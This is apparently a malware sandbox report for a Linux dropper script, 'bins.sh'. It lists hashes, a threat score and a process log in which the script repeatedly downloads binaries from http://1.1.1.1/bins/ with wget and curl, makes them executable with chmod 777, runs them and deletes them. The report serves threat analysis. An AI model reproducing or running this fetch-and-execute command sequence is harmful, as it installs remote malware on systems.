Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
20s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
-
submitted
21/05/2024, 05:50
General
-
Target
bins.sh
-
Size
7KB
-
MD5
2b208b42b087fcaa5de8c84ff9bc567c
-
SHA1
0ac6f73e62a45f6a682660252b9c8f110c8b6efd
-
SHA256
3f30e342a9d9e87f1570cd24f51c25206426231faec2369b91c927ae1c7070c9
-
SHA512
67b32300b3663647d07cf90d14f5678be73994802ad372151102495543d98572a27c85aa6c8cc7fd0f2c06801c43c6332a7dfbcf5c9b6291b6da78f9bae53320
-
SSDEEP
96:XJc9nY8Iu7v2C9vR8EDN34wWOQ/BBJcH93YcLm+Iu7iJRa1gQGn5mvR8EPnN34wR:XJc9XLvR8EDN34wsJcDSCvR8EvN34wR
Score
7/10
Malware Config
Signatures
-
Executes dropped EXE 44 IoCs
-
Writes file to tmp directory 44 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
-
/bin/rmrm bins.sh2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/7z3YX2ZRrPkf2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/7z3YX2ZRrPkf2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 7z3YX2ZRrPkf2⤵
-
-
/tmp/7z3YX2ZRrPkf./7z3YX2ZRrPkf2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./7z3YX2ZRrPkf2⤵
-
-
/bin/rmrm 7z3YX2ZRrPkf2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/3I8g5yO42xhH2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/3I8g5yO42xhH2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 3I8g5yO42xhH2⤵
-
-
/tmp/3I8g5yO42xhH./3I8g5yO42xhH2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./3I8g5yO42xhH2⤵
-
-
/bin/rmrm 3I8g5yO42xhH2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/A5i02Gn0VA282⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/A5i02Gn0VA282⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 A5i02Gn0VA282⤵
-
-
/tmp/A5i02Gn0VA28./A5i02Gn0VA282⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./A5i02Gn0VA282⤵
-
-
/bin/rmrm A5i02Gn0VA282⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/9m5X7bxH0M8M2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/9m5X7bxH0M8M2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 9m5X7bxH0M8M2⤵
-
-
/tmp/9m5X7bxH0M8M./9m5X7bxH0M8M2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./9m5X7bxH0M8M2⤵
-
-
/bin/rmrm 9m5X7bxH0M8M2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/nS4nt37Oor0Q2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/nS4nt37Oor0Q2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 nS4nt37Oor0Q2⤵
-
-
/tmp/nS4nt37Oor0Q./nS4nt37Oor0Q2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./nS4nt37Oor0Q2⤵
-
-
/bin/rmrm nS4nt37Oor0Q2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/3Uzh29sFxCKi2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/3Uzh29sFxCKi2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 3Uzh29sFxCKi2⤵
-
-
/tmp/3Uzh29sFxCKi./3Uzh29sFxCKi2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./3Uzh29sFxCKi2⤵
-
-
/bin/rmrm 3Uzh29sFxCKi2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/g5J58UFe6c282⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/g5J58UFe6c282⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 g5J58UFe6c282⤵
-
-
/tmp/g5J58UFe6c28./g5J58UFe6c282⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./g5J58UFe6c282⤵
-
-
/bin/rmrm g5J58UFe6c282⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/99t5WUMNveDL2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/99t5WUMNveDL2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 99t5WUMNveDL2⤵
-
-
/tmp/99t5WUMNveDL./99t5WUMNveDL2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./99t5WUMNveDL2⤵
-
-
/bin/rmrm 99t5WUMNveDL2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/75R29N7x4smz2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/75R29N7x4smz2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 75R29N7x4smz2⤵
-
-
/tmp/75R29N7x4smz./75R29N7x4smz2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./75R29N7x4smz2⤵
-
-
/bin/rmrm 75R29N7x4smz2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/6DqAV97MRI5l2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/6DqAV97MRI5l2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 6DqAV97MRI5l2⤵
-
-
/tmp/6DqAV97MRI5l./6DqAV97MRI5l2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./6DqAV97MRI5l2⤵
-
-
/bin/rmrm 6DqAV97MRI5l2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/a9B3p9KryWWr2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/a9B3p9KryWWr2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 a9B3p9KryWWr2⤵
-
-
/tmp/a9B3p9KryWWr./a9B3p9KryWWr2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./a9B3p9KryWWr2⤵
-
-
/bin/rmrm a9B3p9KryWWr2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/Keg853zjVUWW2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/Keg853zjVUWW2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 Keg853zjVUWW2⤵
-
-
/tmp/Keg853zjVUWW./Keg853zjVUWW2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./Keg853zjVUWW2⤵
-
-
/bin/rmrm Keg853zjVUWW2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/A9m2V5O178xc2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/A9m2V5O178xc2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 A9m2V5O178xc2⤵
-
-
/tmp/A9m2V5O178xc./A9m2V5O178xc2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./A9m2V5O178xc2⤵
-
-
/bin/rmrm A9m2V5O178xc2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/7n0Oym3K50gk2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/7n0Oym3K50gk2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 7n0Oym3K50gk2⤵
-
-
/tmp/7n0Oym3K50gk./7n0Oym3K50gk2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./7n0Oym3K50gk2⤵
-
-
/bin/rmrm 7n0Oym3K50gk2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/eB36T1Vz1BR72⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/eB36T1Vz1BR72⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 eB36T1Vz1BR72⤵
-
-
/tmp/eB36T1Vz1BR7./eB36T1Vz1BR72⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./eB36T1Vz1BR72⤵
-
-
/bin/rmrm eB36T1Vz1BR72⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/d0S83KAM9zlX2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/d0S83KAM9zlX2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 d0S83KAM9zlX2⤵
-
-
/tmp/d0S83KAM9zlX./d0S83KAM9zlX2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./d0S83KAM9zlX2⤵
-
-
/bin/rmrm d0S83KAM9zlX2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/r47rVZNa4P5H2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/r47rVZNa4P5H2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 r47rVZNa4P5H2⤵
-
-
/tmp/r47rVZNa4P5H./r47rVZNa4P5H2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./r47rVZNa4P5H2⤵
-
-
/bin/rmrm r47rVZNa4P5H2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/xD39YVDoU52O2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/xD39YVDoU52O2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 xD39YVDoU52O2⤵
-
-
/tmp/xD39YVDoU52O./xD39YVDoU52O2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./xD39YVDoU52O2⤵
-
-
/bin/rmrm xD39YVDoU52O2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/412LyNzMjQhY2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/412LyNzMjQhY2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 412LyNzMjQhY2⤵
-
-
/tmp/412LyNzMjQhY./412LyNzMjQhY2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./412LyNzMjQhY2⤵
-
-
/bin/rmrm 412LyNzMjQhY2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/z06C2GvUPwgU2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/z06C2GvUPwgU2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 z06C2GvUPwgU2⤵
-
-
/tmp/z06C2GvUPwgU./z06C2GvUPwgU2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./z06C2GvUPwgU2⤵
-
-
/bin/rmrm z06C2GvUPwgU2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/0hGdo5jn8Uh42⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/0hGdo5jn8Uh42⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 0hGdo5jn8Uh42⤵
-
-
/tmp/0hGdo5jn8Uh4./0hGdo5jn8Uh42⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./0hGdo5jn8Uh42⤵
-
-
/bin/rmrm 0hGdo5jn8Uh42⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/Fl78L8jypOEM2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/Fl78L8jypOEM2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 Fl78L8jypOEM2⤵
-
-
/tmp/Fl78L8jypOEM./Fl78L8jypOEM2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./Fl78L8jypOEM2⤵
-
-
/bin/rmrm Fl78L8jypOEM2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/7z3YX2ZRrPkf2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/7z3YX2ZRrPkf2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 7z3YX2ZRrPkf2⤵
-
-
/tmp/7z3YX2ZRrPkf./7z3YX2ZRrPkf2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./7z3YX2ZRrPkf2⤵
-
-
/bin/rmrm 7z3YX2ZRrPkf2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/3I8g5yO42xhH2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/3I8g5yO42xhH2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 3I8g5yO42xhH2⤵
-
-
/tmp/3I8g5yO42xhH./3I8g5yO42xhH2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./3I8g5yO42xhH2⤵
-
-
/bin/rmrm 3I8g5yO42xhH2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/A5i02Gn0VA282⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/A5i02Gn0VA282⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 A5i02Gn0VA282⤵
-
-
/tmp/A5i02Gn0VA28./A5i02Gn0VA282⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./A5i02Gn0VA282⤵
-
-
/bin/rmrm A5i02Gn0VA282⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/9m5X7bxH0M8M2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/9m5X7bxH0M8M2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 9m5X7bxH0M8M2⤵
-
-
/tmp/9m5X7bxH0M8M./9m5X7bxH0M8M2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./9m5X7bxH0M8M2⤵
-
-
/bin/rmrm 9m5X7bxH0M8M2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/nS4nt37Oor0Q2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/nS4nt37Oor0Q2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 nS4nt37Oor0Q2⤵
-
-
/tmp/nS4nt37Oor0Q./nS4nt37Oor0Q2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./nS4nt37Oor0Q2⤵
-
-
/bin/rmrm nS4nt37Oor0Q2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/3Uzh29sFxCKi2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/3Uzh29sFxCKi2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 3Uzh29sFxCKi2⤵
-
-
/tmp/3Uzh29sFxCKi./3Uzh29sFxCKi2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./3Uzh29sFxCKi2⤵
-
-
/bin/rmrm 3Uzh29sFxCKi2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/g5J58UFe6c282⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/g5J58UFe6c282⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 g5J58UFe6c282⤵
-
-
/tmp/g5J58UFe6c28./g5J58UFe6c282⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./g5J58UFe6c282⤵
-
-
/bin/rmrm g5J58UFe6c282⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/99t5WUMNveDL2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/99t5WUMNveDL2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 99t5WUMNveDL2⤵
-
-
/tmp/99t5WUMNveDL./99t5WUMNveDL2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./99t5WUMNveDL2⤵
-
-
/bin/rmrm 99t5WUMNveDL2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/75R29N7x4smz2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/75R29N7x4smz2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 75R29N7x4smz2⤵
-
-
/tmp/75R29N7x4smz./75R29N7x4smz2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./75R29N7x4smz2⤵
-
-
/bin/rmrm 75R29N7x4smz2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/6DqAV97MRI5l2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/6DqAV97MRI5l2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 6DqAV97MRI5l2⤵
-
-
/tmp/6DqAV97MRI5l./6DqAV97MRI5l2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./6DqAV97MRI5l2⤵
-
-
/bin/rmrm 6DqAV97MRI5l2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/a9B3p9KryWWr2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/a9B3p9KryWWr2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 a9B3p9KryWWr2⤵
-
-
/tmp/a9B3p9KryWWr./a9B3p9KryWWr2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./a9B3p9KryWWr2⤵
-
-
/bin/rmrm a9B3p9KryWWr2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/Keg853zjVUWW2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/Keg853zjVUWW2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 Keg853zjVUWW2⤵
-
-
/tmp/Keg853zjVUWW./Keg853zjVUWW2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./Keg853zjVUWW2⤵
-
-
/bin/rmrm Keg853zjVUWW2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/A9m2V5O178xc2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/A9m2V5O178xc2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 A9m2V5O178xc2⤵
-
-
/tmp/A9m2V5O178xc./A9m2V5O178xc2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./A9m2V5O178xc2⤵
-
-
/bin/rmrm A9m2V5O178xc2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/7n0Oym3K50gk2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/7n0Oym3K50gk2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 7n0Oym3K50gk2⤵
-
-
/tmp/7n0Oym3K50gk./7n0Oym3K50gk2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./7n0Oym3K50gk2⤵
-
-
/bin/rmrm 7n0Oym3K50gk2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/eB36T1Vz1BR72⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/eB36T1Vz1BR72⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 eB36T1Vz1BR72⤵
-
-
/tmp/eB36T1Vz1BR7./eB36T1Vz1BR72⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./eB36T1Vz1BR72⤵
-
-
/bin/rmrm eB36T1Vz1BR72⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/d0S83KAM9zlX2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/d0S83KAM9zlX2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 d0S83KAM9zlX2⤵
-
-
/tmp/d0S83KAM9zlX./d0S83KAM9zlX2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./d0S83KAM9zlX2⤵
-
-
/bin/rmrm d0S83KAM9zlX2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/r47rVZNa4P5H2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/r47rVZNa4P5H2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 r47rVZNa4P5H2⤵
-
-
/tmp/r47rVZNa4P5H./r47rVZNa4P5H2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./r47rVZNa4P5H2⤵
-
-
/bin/rmrm r47rVZNa4P5H2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/xD39YVDoU52O2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/xD39YVDoU52O2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 xD39YVDoU52O2⤵
-
-
/tmp/xD39YVDoU52O./xD39YVDoU52O2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./xD39YVDoU52O2⤵
-
-
/bin/rmrm xD39YVDoU52O2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/412LyNzMjQhY2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/412LyNzMjQhY2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 412LyNzMjQhY2⤵
-
-
/tmp/412LyNzMjQhY./412LyNzMjQhY2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./412LyNzMjQhY2⤵
-
-
/bin/rmrm 412LyNzMjQhY2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/z06C2GvUPwgU2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/z06C2GvUPwgU2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 z06C2GvUPwgU2⤵
-
-
/tmp/z06C2GvUPwgU./z06C2GvUPwgU2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./z06C2GvUPwgU2⤵
-
-
/bin/rmrm z06C2GvUPwgU2⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/0hGdo5jn8Uh42⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/0hGdo5jn8Uh42⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 0hGdo5jn8Uh42⤵
-
-
/tmp/0hGdo5jn8Uh4./0hGdo5jn8Uh42⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./0hGdo5jn8Uh42⤵
-
-
/bin/rmrm 0hGdo5jn8Uh42⤵
-
-
/usr/bin/wgetwget http://1.1.1.1/bins/Fl78L8jypOEM2⤵
-
-
/usr/bin/curlcurl -O http://1.1.1.1/bins/Fl78L8jypOEM2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 Fl78L8jypOEM2⤵
-
-
/tmp/Fl78L8jypOEM./Fl78L8jypOEM2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./Fl78L8jypOEM2⤵
-
-
/bin/rmrm Fl78L8jypOEM2⤵
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
167B
MD50104c301c5e02bd6148b8703d19b3a73
SHA17436e0b4b1f8c222c38069890b75fa2baf9ca620
SHA256446a6087825fa73eadb045e5a2e9e2adf7df241b571228187728191d961dda1f
SHA51284427b656a6234a651a6d8285c103645b861a18a6c5af4abb5cb4f3beb5a4f0df4a74603a0896c7608790fbb886dc40508e92d5709f44dca05dd46c8316d15bf